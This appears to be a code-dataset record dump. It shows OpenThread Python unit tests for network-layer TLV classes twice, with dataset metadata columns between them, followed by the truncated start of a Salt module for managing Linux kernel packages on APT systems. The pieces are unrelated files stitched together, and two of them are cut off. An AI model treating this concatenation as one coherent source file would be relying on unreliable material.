return bytearray([random.getrandbits(8) for _ in range(8)])
def any_rloc16():
return random.getrandbits(16)
def any_ml_eid():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_status():
return random.getrandbits(1)
def any_seconds():
return random.getrandbits(32)
def any_id_sequence():
return random.getrandbits(8)
def any_router_id_mask():
return random.getrandbits(64)
def any_options(count=None):
count = count if count is not None else random.randint(0, 255)
return [random.getrandbits(8) for _ in range(count)]
def any_tlv_data(length=None):
_type = random.getrandbits(8)
length = length if length is not None else random.getrandbits(8)
value = bytearray([random.getrandbits(8) for _ in range(length)])
return bytearray([_type, length]) + value
def any_tlvs_data(count=None):
count = count if count is not None else random.randint(0, 16)
data = bytearray()
for _ in range(count):
data += any_tlv_data(random.randint(1, 15))
return data
class TestTargetEid(unittest.TestCase):
def test_should_return_eid_value_when_eid_property_is_called(self):
# GIVEN
eid = any_eid()
target_eid = network_layer.TargetEid(eid)
# WHEN
actual_eid = target_eid.eid
# THEN
self.assertEqual(eid, actual_eid)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
eid = any_eid()
target_eid = network_layer.TargetEid(eid)
# THEN
self.assertEqual(target_eid, network_layer.TargetEid(eid))
class TestTargetEidFactory(unittest.TestCase):
def test_should_create_TargetEid_from_bytearray_when_parse_method_is_called(self):
# GIVEN
eid = any_eid()
factory = network_layer.TargetEidFactory()
# WHEN
target_eid = factory.parse(io.BytesIO(eid), common.MessageInfo())
# THEN
self.assertTrue(isinstance(target_eid, network_layer.TargetEid))
self.assertEqual(eid, target_eid.eid)
class TestMacExtendedAddress(unittest.TestCase):
def test_should_return_mac_address_value_when_mac_address_property_is_called(self):
# GIVEN
mac_address = any_mac_extended_address()
mac_extended_address = network_layer.MacExtendedAddress(mac_address)
# WHEN
actual_mac_address = mac_extended_address.mac_address
# THEN
self.assertEqual(mac_address, actual_mac_address)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
mac_address = any_mac_extended_address()
mac_extended_address = network_layer.MacExtendedAddress(mac_address)
# THEN
self.assertEqual(mac_extended_address, network_layer.MacExtendedAddress(mac_address))
class TestMacExtendedAddressFactory(unittest.TestCase):
def test_should_create_MacExtendedAddress_from_bytearray_when_parse_method_is_called(self):
# GIVEN
mac_address = any_mac_extended_address()
factory = network_layer.MacExtendedAddressFactory()
# WHEN
mac_extended_address = factory.parse(io.BytesIO(mac_address), common.MessageInfo())
# THEN
self.assertTrue(isinstance(mac_extended_address, network_layer.MacExtendedAddress))
self.assertEqual(mac_address, mac_extended_address.mac_address)
class TestRloc16(unittest.TestCase):
def test_should_return_rloc16_value_when_rloc16_property_is_called(self):
# GIVEN
rloc16 = any_rloc16()
rloc16_obj = network_layer.Rloc16(rloc16)
# WHEN
actual_rloc16 = rloc16_obj.rloc16
# THEN
self.assertEqual(rloc16, actual_rloc16)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
rloc16 = any_rloc16()
rloc16_obj = network_layer.Rloc16(rloc16)
# THEN
self.assertEqual(rloc16_obj, network_layer.Rloc16(rloc16))
class TestRloc16Factory(unittest.TestCase):
def test_should_create_Rloc16_from_bytearray_when_parse_method_is_called(self):
# GIVEN
rloc16 = any_rloc16()
factory = network_layer.Rloc16Factory()
data = bytearray(struct.pack(">H", rloc16))
# WHEN
rloc16_obj = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(rloc16_obj, network_layer.Rloc16))
self.assertEqual(rloc16, rloc16_obj.rloc16)
class TestMlEid(unittest.TestCase):
def test_should_return_ml_eid_value_when_ml_eid_property_is_called(self):
# GIVEN
ml_eid = any_ml_eid()
ml_eid_obj = network_layer.MlEid(ml_eid)
# WHEN
actual_ml_eid = ml_eid_obj.ml_eid
# THEN
self.assertEqual(ml_eid, actual_ml_eid)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
ml_eid = any_ml_eid()
ml_eid_obj = network_layer.MlEid(ml_eid)
# THEN
self.assertEqual(ml_eid_obj, network_layer.MlEid(ml_eid))
class TestMlEidFactory(unittest.TestCase):
def test_should_create_MlEid_from_bytearray_when_parse_method_is_called(self):
# GIVEN
ml_eid = any_ml_eid()
factory = network_layer.MlEidFactory()
# WHEN
ml_eid_obj = factory.parse(io.BytesIO(ml_eid), common.MessageInfo())
# THEN
self.assertTrue(isinstance(ml_eid_obj, network_layer.MlEid))
self.assertEqual(ml_eid, ml_eid_obj.ml_eid)
class TestStatus(unittest.TestCase):
def test_should_return_status_value_when_status_property_is_called(self):
# GIVEN
status = any_status()
status_obj = network_layer.Status(status)
# WHEN
actual_status = status_obj.status
# THEN
self.assertEqual(status, actual_status)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
status = any_status()
status_obj = network_layer.Status(status)
# THEN
self.assertEqual(status_obj, network_layer.Status(status))
class TestStatusFactory(unittest.TestCase):
def test_should_create_Status_from_bytearray_when_parse_method_is_called(self):
# GIVEN
status = any_status()
factory = network_layer.StatusFactory()
data = bytearray([status])
# WHEN
status_obj = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(status_obj, network_layer.Status))
self.assertEqual(status, status_obj.status)
class TestTimeSinceLastTransaction(unittest.TestCase):
def test_should_return_seconds_value_when_seconds_property_is_called(self):
# GIVEN
seconds = any_seconds()
time_since_last_transaction = network_layer.TimeSinceLastTransaction(seconds)
# WHEN
actual_seconds = time_since_last_transaction.seconds
# THEN
self.assertEqual(seconds, actual_seconds)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
seconds = any_seconds()
time_since_last_transaction = network_layer.TimeSinceLastTransaction(seconds)
# THEN
self.assertEqual(
time_since_last_transaction,
network_layer.TimeSinceLastTransaction(seconds),
)
class TestTimeSinceLastTransactionFactory(unittest.TestCase):
def test_should_create_TimeSinceLastTransaction_from_bytearray_when_parse_method_is_called(self):
# GIVEN
seconds = any_seconds()
factory = network_layer.TimeSinceLastTransactionFactory()
data = bytearray(struct.pack(">L", seconds))
# WHEN
time_since_last_transaction = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(
time_since_last_transaction,
network_layer.TimeSinceLastTransaction,
))
self.assertEqual(seconds, time_since_last_transaction.seconds)
class TestRouterMask(unittest.TestCase):
def test_should_return_id_sequence_value_when_id_sequence_property_is_called(self):
# GIVEN
id_sequence = any_id_sequence()
router_mask = network_layer.RouterMask(id_sequence, any_router_id_mask())
# WHEN
actual_id_sequence = router_mask.id_sequence
# THEN
self.assertEqual(id_sequence, actual_id_sequence)
def test_should_return_router_id_mask_value_when_router_id_mask_property_is_called(self):
# GIVEN
router_id_mask = any_router_id_mask()
router_mask = network_layer.RouterMask(any_id_sequence(), router_id_mask)
# WHEN
actual_router_id_mask = router_mask.router_id_mask
# THEN
self.assertEqual(router_id_mask, actual_router_id_mask)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
id_sequence = any_id_sequence()
router_id_mask = any_router_id_mask()
router_mask = network_layer.RouterMask(id_sequence, router_id_mask)
# THEN
self.assertEqual(router_mask, network_layer.RouterMask(id_sequence, router_id_mask))
class TestRouterMaskFactory(unittest.TestCase):
def test_should_create_RouterMask_from_bytearray_when_parse_method_is_called(self):
# GIVEN
id_sequence = any_id_sequence()
router_id_mask = any_router_id_mask()
factory = network_layer.RouterMaskFactory()
data = bytearray([id_sequence]) + struct.pack(">Q", router_id_mask)
# WHEN
router_mask = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(router_mask, network_layer.RouterMask))
self.assertEqual(id_sequence, router_mask.id_sequence)
self.assertEqual(router_id_mask, router_mask.router_id_mask)
class TestNdOption(unittest.TestCase):
def test_should_return_options_value_when_options_property_is_called(self):
# GIVEN
options = any_options()
nd_option = network_layer.NdOption(options)
# WHEN
actual_options = nd_option.options
# THEN
self.assertEqual(options, actual_options)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
options = any_options()
nd_option = network_layer.NdOption(options)
# THEN
self.assertEqual(nd_option, network_layer.NdOption(options))
class TestNdOptionFactory(unittest.TestCase):
def test_should_create_NdOption_from_bytearray_when_parse_method_is_called(self):
# GIVEN
options = any_options()
factory = network_layer.NdOptionFactory()
data = bytearray(options)
# WHEN
nd_option = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(nd_option, network_layer.NdOption))
self.assertEqual(options, nd_option.options)
class TestThreadNetworkData(unittest.TestCase):
def test_should_return_options_value_when_options_property_is_called(self):
# GIVEN
tlvs = any_tlvs_data()
thread_network_data = network_layer.ThreadNetworkData(tlvs)
# WHEN
actual_tlvs = thread_network_data.tlvs
# THEN
self.assertEqual(tlvs, actual_tlvs)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
tlvs = any_tlvs_data()
thread_network_data = network_layer.ThreadNetworkData(tlvs)
# THEN
self.assertEqual(thread_network_data, network_layer.ThreadNetworkData(tlvs))
class TestThreadNetworkDataFactory(unittest.TestCase):
def test_should_create_ThreadNetworkData_from_bytearray_when_parse_method_is_called(self):
# GIVEN
tlvs = any_tlvs_data()
class DummyNetworkDataTlvsFactory:
def parse(self, data, message_info):
return bytearray(data.read())
factory = network_layer.ThreadNetworkDataFactory(DummyNetworkDataTlvsFactory())
# WHEN
thread_network_data = factory.parse(io.BytesIO(tlvs), common.MessageInfo())
# THEN
self.assertTrue(isinstance(thread_network_data, network_layer.ThreadNetworkData))
self.assertEqual(tlvs, thread_network_data.tlvs)
if __name__ == "__main__":
unittest.main()
| #!/usr/bin/env python3
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import io
import random
import struct
import unittest
import common
import network_layer
def any_eid():
return bytearray([random.getrandbits(8) for _ in range(16)])
def any_mac_extended_address():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_rloc16():
return random.getrandbits(16)
def any_ml_eid():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_status():
return random.getrandbits(1)
def any_seconds():
return random.getrandbits(32)
def any_id_sequence():
return random.getrandbits(8)
def any_router_id_mask():
return random.getrandbits(64)
def any_options(count=None):
count = count if count is not None else random.randint(0, 255)
return [random.getrandbits(8) for _ in range(count)]
def any_tlv_data(length=None):
_type = random.getrandbits(8)
length = length if length is not None else random.getrandbits(8)
value = bytearray([random.getrandbits(8) for _ in range(length)])
return bytearray([_type, length]) + value
def any_tlvs_data(count=None):
count = count if count is not None else random.randint(0, 16)
data = bytearray()
for _ in range(count):
data += any_tlv_data(random.randint(1, 15))
return data
class TestTargetEid(unittest.TestCase):
def test_should_return_eid_value_when_eid_property_is_called(self):
# GIVEN
eid = any_eid()
target_eid = network_layer.TargetEid(eid)
# WHEN
actual_eid = target_eid.eid
# THEN
self.assertEqual(eid, actual_eid)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
eid = any_eid()
target_eid = network_layer.TargetEid(eid)
# THEN
self.assertEqual(target_eid, network_layer.TargetEid(eid))
class TestTargetEidFactory(unittest.TestCase):
def test_should_create_TargetEid_from_bytearray_when_parse_method_is_called(self):
# GIVEN
eid = any_eid()
factory = network_layer.TargetEidFactory()
# WHEN
target_eid = factory.parse(io.BytesIO(eid), common.MessageInfo())
# THEN
self.assertTrue(isinstance(target_eid, network_layer.TargetEid))
self.assertEqual(eid, target_eid.eid)
class TestMacExtendedAddress(unittest.TestCase):
def test_should_return_mac_address_value_when_mac_address_property_is_called(self):
# GIVEN
mac_address = any_mac_extended_address()
mac_extended_address = network_layer.MacExtendedAddress(mac_address)
# WHEN
actual_mac_address = mac_extended_address.mac_address
# THEN
self.assertEqual(mac_address, actual_mac_address)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
mac_address = any_mac_extended_address()
mac_extended_address = network_layer.MacExtendedAddress(mac_address)
# THEN
self.assertEqual(mac_extended_address, network_layer.MacExtendedAddress(mac_address))
class TestMacExtendedAddressFactory(unittest.TestCase):
def test_should_create_MacExtendedAddress_from_bytearray_when_parse_method_is_called(self):
# GIVEN
mac_address = any_mac_extended_address()
factory = network_layer.MacExtendedAddressFactory()
# WHEN
mac_extended_address = factory.parse(io.BytesIO(mac_address), common.MessageInfo())
# THEN
self.assertTrue(isinstance(mac_extended_address, network_layer.MacExtendedAddress))
self.assertEqual(mac_address, mac_extended_address.mac_address)
class TestRloc16(unittest.TestCase):
def test_should_return_rloc16_value_when_rloc16_property_is_called(self):
# GIVEN
rloc16 = any_rloc16()
rloc16_obj = network_layer.Rloc16(rloc16)
# WHEN
actual_rloc16 = rloc16_obj.rloc16
# THEN
self.assertEqual(rloc16, actual_rloc16)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
rloc16 = any_rloc16()
rloc16_obj = network_layer.Rloc16(rloc16)
# THEN
self.assertEqual(rloc16_obj, network_layer.Rloc16(rloc16))
class TestRloc16Factory(unittest.TestCase):
def test_should_create_Rloc16_from_bytearray_when_parse_method_is_called(self):
# GIVEN
rloc16 = any_rloc16()
factory = network_layer.Rloc16Factory()
data = bytearray(struct.pack(">H", rloc16))
# WHEN
rloc16_obj = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(rloc16_obj, network_layer.Rloc16))
self.assertEqual(rloc16, rloc16_obj.rloc16)
class TestMlEid(unittest.TestCase):
def test_should_return_ml_eid_value_when_ml_eid_property_is_called(self):
# GIVEN
ml_eid = any_ml_eid()
ml_eid_obj = network_layer.MlEid(ml_eid)
# WHEN
actual_ml_eid = ml_eid_obj.ml_eid
# THEN
self.assertEqual(ml_eid, actual_ml_eid)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
ml_eid = any_ml_eid()
ml_eid_obj = network_layer.MlEid(ml_eid)
# THEN
self.assertEqual(ml_eid_obj, network_layer.MlEid(ml_eid))
class TestMlEidFactory(unittest.TestCase):
def test_should_create_MlEid_from_bytearray_when_parse_method_is_called(self):
# GIVEN
ml_eid = any_ml_eid()
factory = network_layer.MlEidFactory()
# WHEN
ml_eid_obj = factory.parse(io.BytesIO(ml_eid), common.MessageInfo())
# THEN
self.assertTrue(isinstance(ml_eid_obj, network_layer.MlEid))
self.assertEqual(ml_eid, ml_eid_obj.ml_eid)
class TestStatus(unittest.TestCase):
def test_should_return_status_value_when_status_property_is_called(self):
# GIVEN
status = any_status()
status_obj = network_layer.Status(status)
# WHEN
actual_status = status_obj.status
# THEN
self.assertEqual(status, actual_status)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
status = any_status()
status_obj = network_layer.Status(status)
# THEN
self.assertEqual(status_obj, network_layer.Status(status))
class TestStatusFactory(unittest.TestCase):
def test_should_create_Status_from_bytearray_when_parse_method_is_called(self):
# GIVEN
status = any_status()
factory = network_layer.StatusFactory()
data = bytearray([status])
# WHEN
status_obj = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(status_obj, network_layer.Status))
self.assertEqual(status, status_obj.status)
class TestTimeSinceLastTransaction(unittest.TestCase):
def test_should_return_seconds_value_when_seconds_property_is_called(self):
# GIVEN
seconds = any_seconds()
time_since_last_transaction = network_layer.TimeSinceLastTransaction(seconds)
# WHEN
actual_seconds = time_since_last_transaction.seconds
# THEN
self.assertEqual(seconds, actual_seconds)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
seconds = any_seconds()
time_since_last_transaction = network_layer.TimeSinceLastTransaction(seconds)
# THEN
self.assertEqual(
time_since_last_transaction,
network_layer.TimeSinceLastTransaction(seconds),
)
class TestTimeSinceLastTransactionFactory(unittest.TestCase):
def test_should_create_TimeSinceLastTransaction_from_bytearray_when_parse_method_is_called(self):
# GIVEN
seconds = any_seconds()
factory = network_layer.TimeSinceLastTransactionFactory()
data = bytearray(struct.pack(">L", seconds))
# WHEN
time_since_last_transaction = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(
time_since_last_transaction,
network_layer.TimeSinceLastTransaction,
))
self.assertEqual(seconds, time_since_last_transaction.seconds)
class TestRouterMask(unittest.TestCase):
def test_should_return_id_sequence_value_when_id_sequence_property_is_called(self):
# GIVEN
id_sequence = any_id_sequence()
router_mask = network_layer.RouterMask(id_sequence, any_router_id_mask())
# WHEN
actual_id_sequence = router_mask.id_sequence
# THEN
self.assertEqual(id_sequence, actual_id_sequence)
def test_should_return_router_id_mask_value_when_router_id_mask_property_is_called(self):
# GIVEN
router_id_mask = any_router_id_mask()
router_mask = network_layer.RouterMask(any_id_sequence(), router_id_mask)
# WHEN
actual_router_id_mask = router_mask.router_id_mask
# THEN
self.assertEqual(router_id_mask, actual_router_id_mask)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
id_sequence = any_id_sequence()
router_id_mask = any_router_id_mask()
router_mask = network_layer.RouterMask(id_sequence, router_id_mask)
# THEN
self.assertEqual(router_mask, network_layer.RouterMask(id_sequence, router_id_mask))
class TestRouterMaskFactory(unittest.TestCase):
def test_should_create_RouterMask_from_bytearray_when_parse_method_is_called(self):
# GIVEN
id_sequence = any_id_sequence()
router_id_mask = any_router_id_mask()
factory = network_layer.RouterMaskFactory()
data = bytearray([id_sequence]) + struct.pack(">Q", router_id_mask)
# WHEN
router_mask = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(router_mask, network_layer.RouterMask))
self.assertEqual(id_sequence, router_mask.id_sequence)
self.assertEqual(router_id_mask, router_mask.router_id_mask)
class TestNdOption(unittest.TestCase):
def test_should_return_options_value_when_options_property_is_called(self):
# GIVEN
options = any_options()
nd_option = network_layer.NdOption(options)
# WHEN
actual_options = nd_option.options
# THEN
self.assertEqual(options, actual_options)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
options = any_options()
nd_option = network_layer.NdOption(options)
# THEN
self.assertEqual(nd_option, network_layer.NdOption(options))
class TestNdOptionFactory(unittest.TestCase):
def test_should_create_NdOption_from_bytearray_when_parse_method_is_called(self):
# GIVEN
options = any_options()
factory = network_layer.NdOptionFactory()
data = bytearray(options)
# WHEN
nd_option = factory.parse(io.BytesIO(data), common.MessageInfo())
# THEN
self.assertTrue(isinstance(nd_option, network_layer.NdOption))
self.assertEqual(options, nd_option.options)
class TestThreadNetworkData(unittest.TestCase):
def test_should_return_options_value_when_options_property_is_called(self):
# GIVEN
tlvs = any_tlvs_data()
thread_network_data = network_layer.ThreadNetworkData(tlvs)
# WHEN
actual_tlvs = thread_network_data.tlvs
# THEN
self.assertEqual(tlvs, actual_tlvs)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
tlvs = any_tlvs_data()
thread_network_data = network_layer.ThreadNetworkData(tlvs)
# THEN
self.assertEqual(thread_network_data, network_layer.ThreadNetworkData(tlvs))
class TestThreadNetworkDataFactory(unittest.TestCase):
def test_should_create_ThreadNetworkData_from_bytearray_when_parse_method_is_called(self):
# GIVEN
tlvs = any_tlvs_data()
class DummyNetworkDataTlvsFactory:
def parse(self, data, message_info):
return bytearray(data.read())
factory = network_layer.ThreadNetworkDataFactory(DummyNetworkDataTlvsFactory())
# WHEN
thread_network_data = factory.parse(io.BytesIO(tlvs), common.MessageInfo())
# THEN
self.assertTrue(isinstance(thread_network_data, network_layer.ThreadNetworkData))
self.assertEqual(tlvs, thread_network_data.tlvs)
if __name__ == "__main__":
unittest.main() | en | 0.697065 | #!/usr/bin/env python3 # # Copyright (c) 2016, The OpenThread Authors. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of the copyright holder nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN # GIVEN # WHEN # THEN # GIVEN # THEN # GIVEN # WHEN # THEN | 1.506472 | 2 |
salt/modules/kernelpkg_linux_apt.py | markgras/salt | 9,425 | 8077 | <filename>salt/modules/kernelpkg_linux_apt.py
"""
Manage Linux kernel packages on APT-based systems
"""
import functools
import logging
import re
try:
from salt.utils.versions import LooseVersion as _LooseVersion
from salt.exceptions import CommandExecutionError
HAS_REQUIRED_LIBS = True
except ImportError:
HAS_REQUIRED_LIBS = False
log = logging.getLogger(__name__)
__virtualname__ = "kernelpkg"
def __virtual__():
"""
Load this module on Debian-based systems only
"""
if not HAS_REQUIRED_LIBS:
return (False, "Required library could not be imported")
if __grains__.get("os_family", "") in ("Kali", "Debian"):
return __virtualname__
elif __grains__.get("os_family", "") == "Cumulus":
return __virtualname__
return (False, "Module kernelpkg_linux_apt: no APT based system detected")
def active():
"""
Return the version of the running kernel.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.active
"""
if "pkg.normalize_name" in __salt__:
return __salt__["pkg.normalize_name"](__grains__["kernelrelease"])
return __grains__["kernelrelease"]
def list_installed():
"""
Return a list of all installed kernels.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.list_installed
"""
pkg_re = re.compile(r"^{}-[\d.-]+-{}$".format(_package_prefix(), _kernel_type()))
pkgs = __salt__["pkg.list_pkgs"](versions_as_list=True)
if pkgs is None:
pkgs = []
result = list(filter(pkg_re.match, pkgs))
if result is None:
return []
prefix_len = len(_package_prefix()) + 1
return sorted(
[pkg[prefix_len:] for pkg in result], key=functools.cmp_to_key(_cmp_version)
)
def latest_available():
"""
Return the version of the latest kernel from the package repositories.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.latest_available
"""
result = __salt__["pkg.latest_version"](
"{}-{}".format(_package_prefix(), _kernel_type())
)
if result == "":
return latest_installed()
version = re.match(r"^(\d+\.\d+\.\d+)\.(\d+)", result)
return "{}-{}-{}".format(version.group(1), version.group(2), _kernel_type())
def latest_installed():
"""
Return the version of the latest installed kernel.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.latest_installed
.. note::
This function may not return the same value as
:py:func:`~salt.modules.kernelpkg_linux_apt.active` if a new kernel
has been installed and the system has not yet been rebooted.
The :py:func:`~salt.modules.kernelpkg_linux_apt.needs_reboot` function
exists to detect this condition.
"""
pkgs = list_installed()
if pkgs:
return pkgs[-1]
return None
def needs_reboot():
"""
Detect if a new kernel version has been installed but is not running.
Returns True if a new kernel is installed, False otherwise.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.needs_reboot
"""
return _LooseVersion(active()) < _LooseVersion(latest_installed())
def upgrade(reboot=False, at_time=None):
"""
Upgrade the kernel and optionally reboot the system.
reboot : False
Request a reboot if a new kernel is available.
at_time : immediate
Schedule the reboot at some point in the future. This argument
is ignored if ``reboot=False``. See
:py:func:`~salt.modules.system.reboot` for more details
on this argument.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.upgrade
salt '*' kernelpkg.upgrade reboot=True at_time=1
.. note::
An immediate reboot often shuts down the system before the minion has a
chance to return, resulting in errors. A minimal delay (1 minute) is
useful to ensure the result is delivered to the master.
"""
result = __salt__["pkg.install"](
name="{}-{}".format(_package_prefix(), latest_available())
)
_needs_reboot = needs_reboot()
ret = {
"upgrades": result,
"active": active(),
"latest_installed": latest_installed(),
"reboot_requested": reboot,
"reboot_required": _needs_reboot,
}
if reboot and _needs_reboot:
log.warning("Rebooting system due to kernel upgrade")
__salt__["system.reboot"](at_time=at_time)
return ret
def upgrade_available():
"""
Detect if a new kernel version is available in the repositories.
Returns True if a new kernel is available, False otherwise.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.upgrade_available
"""
return _LooseVersion(latest_available()) > _LooseVersion(latest_installed())
def remove(release):
"""
Remove a specific version of the kernel.
release
The release number of an installed kernel. This must be the entire release
number as returned by :py:func:`~salt.modules.kernelpkg_linux_apt.list_installed`,
not the package name.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.remove 4.4.0-70-generic
"""
if release not in list_installed():
raise CommandExecutionError(
"Kernel release '{}' is not installed".format(release)
)
if release == active():
raise CommandExecutionError("Active kernel cannot be removed")
target = "{}-{}".format(_package_prefix(), release)
log.info("Removing kernel package %s", target)
__salt__["pkg.purge"](target)
return {"removed": [target]}
def cleanup(keep_latest=True):
"""
Remove all unused kernel packages from the system.
keep_latest : True
In the event that the active kernel is not the latest one installed, setting this to True
will retain the latest kernel package, in addition to the active one. If False, all kernel
packages other than the active one will be removed.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.cleanup
"""
removed = []
# Loop over all installed kernel packages
for kernel in list_installed():
# Keep the active kernel package
if kernel == active():
continue
# Optionally keep the latest kernel package
if keep_latest and kernel == latest_installed():
continue
# Remove the kernel package
removed.extend(remove(kernel)["removed"])
return {"removed": removed}
def _package_prefix():
"""
Return static string for the package prefix
"""
return "linux-image"
def _kernel_type():
"""
Parse the kernel name and return its type
"""
return re.match(r"^[\d.-]+-(.+)$", active()).group(1)
def _cmp_version(item1, item2):
"""
Compare function for package version sorting
"""
vers1 = _LooseVersion(item1)
vers2 = _LooseVersion(item2)
if vers1 < vers2:
return -1
if vers1 > vers2:
return 1
return 0
| <filename>salt/modules/kernelpkg_linux_apt.py
"""
Manage Linux kernel packages on APT-based systems
"""
import functools
import logging
import re
try:
from salt.utils.versions import LooseVersion as _LooseVersion
from salt.exceptions import CommandExecutionError
HAS_REQUIRED_LIBS = True
except ImportError:
HAS_REQUIRED_LIBS = False
log = logging.getLogger(__name__)
__virtualname__ = "kernelpkg"
def __virtual__():
"""
Load this module on Debian-based systems only
"""
if not HAS_REQUIRED_LIBS:
return (False, "Required library could not be imported")
if __grains__.get("os_family", "") in ("Kali", "Debian"):
return __virtualname__
elif __grains__.get("os_family", "") == "Cumulus":
return __virtualname__
return (False, "Module kernelpkg_linux_apt: no APT based system detected")
def active():
"""
Return the version of the running kernel.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.active
"""
if "pkg.normalize_name" in __salt__:
return __salt__["pkg.normalize_name"](__grains__["kernelrelease"])
return __grains__["kernelrelease"]
def list_installed():
"""
